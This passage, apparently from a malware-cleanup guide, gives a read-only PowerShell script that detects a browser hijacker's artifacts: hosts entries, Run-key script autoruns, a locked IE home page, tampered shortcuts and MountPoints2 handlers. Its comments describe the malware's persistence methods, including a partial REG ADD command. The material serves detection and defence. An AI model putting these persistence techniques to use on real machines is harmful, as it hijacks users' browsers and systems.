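        if ($line -match '^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)') {
            $ip = $Matches[1]; $name = $Matches[2]
            if ($ip -in @('127.0.0.1', '0.0.0.0')) { continue }
            [pscustomobject]@{
                Check = 'hosts'
                Item  = "$ip $name"
                Note  = $(if ($ip -eq $SuspectIp) { 'matches the IP in the dropper' }
                          elseif ($name -in $SearchHosts) { 'search engine redirected' }
                          else { 'non-loopback entry, review' })
            }
        }
    }
}

function Get-RunKeyScript {
    # The batch file registers appdat, appdat1..appdat4 under HKCU\...\Run, each
    # pointing at a .bat/.vbs in %APPDATA%. Report Run values that launch a script
    # file or anything under AppData. PS* properties are PowerShell's own metadata.
    $key   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { return }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -in @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')) { continue }
        $cmd = [string]$p.Value
        if ($cmd -match '\.(vbs|bat|cmd|js|wsf|ps1)\b' -or $cmd -match '\\AppData\\') {
            [pscustomobject]@{ Check = 'HKCU Run'; Item = "$($p.Name) = $cmd"; Note = 'script or AppData autorun, review' }
        }
    }
}

function Get-HomePageLock {
    # REG ADD ...\Control Panel /v HomePage /d 1 is the policy that greys out the IE
    # home page setting. Check both the user and the machine policy hive.
    foreach ($hive in 'HKCU', 'HKLM') {
        $key = "${hive}:\Software\Policies\Microsoft\Internet Explorer\Control Panel"
        $v = Get-ItemProperty -Path $key -Name HomePage -ErrorAction SilentlyContinue
        if ($v -and $v.HomePage -eq 1) {
            [pscustomobject]@{ Check = 'IE policy'; Item = "$key\HomePage = 1"; Note = 'home page locked by policy' }
        }
    }
}

function Get-BrowserShortcutTamper {
    # The VBS files rewrite the pinned-taskbar and desktop browser shortcuts to open a
    # URL with switches such as -ignore-certificate-errors. A stock browser shortcut has
    # an empty Arguments field, so any arguments on a browser .lnk are reported.
    $shell = New-Object -ComObject WScript.Shell
    $dirs  = @("$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
               [Environment]::GetFolderPath('Desktop'))
    foreach ($lnk in Get-ChildItem -Path $dirs -Filter *.lnk -ErrorAction SilentlyContinue) {
        $sc = $shell.CreateShortcut($lnk.FullName)
        if ($sc.TargetPath -notmatch '\\(chrome|firefox|iexplore)\.exe$') { continue }
        if ([string]::IsNullOrWhiteSpace($sc.Arguments)) { continue }
        [pscustomobject]@{ Check = 'shortcut'; Item = "$($lnk.Name) -> $($sc.TargetPath) $($sc.Arguments)"; Note = 'browser shortcut carries arguments, review' }
    }
}

function Get-MountPointAutorun {
    # MountPoints2 caches per-drive autorun handlers; the FRST fix removed three
    # (F:\setup.exe, G:\bunnyust.exe, F:\Startme.exe). Report any shell\AutoRun\command left.
    $base = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2'
    Get-ChildItem -Path $base -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -like '*\shell\AutoRun\command' } |
        ForEach-Object {
            [pscustomobject]@{ Check = 'MountPoints2'; Item = "$($_.Name) = $($_.GetValue(''))"; Note = 'removable-drive autorun handler' }
        }
}

$findings = @(Get-HostsHijack) + @(Get-RunKeyScript) + @(Get-HomePageLock) +
            @(Get-BrowserShortcutTamper) + @(Get-MountPointAutorun)
if ($findings.Count -eq 0) { 'No hijack artifacts found.' }
else { $findings | Format-Table Check, Item, Note -AutoSize -Wrap }
```

Run it before and after a cleanup to confirm the entries are gone. It only inspects the current user's HKCU hive; on a machine with several profiles, run it once per user or load the other hives first. The shortcut check reads .lnk files through the WScript.Shell COM object, so it reports the same TargetPath and Arguments fields the VBS scripts modify.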